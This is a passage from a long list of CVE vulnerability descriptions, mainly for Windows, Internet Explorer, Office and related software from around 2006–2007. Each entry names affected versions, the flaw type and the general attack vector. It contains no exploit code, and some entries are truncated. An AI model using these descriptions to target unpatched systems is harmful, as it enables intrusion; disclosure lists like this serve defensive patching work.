XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in 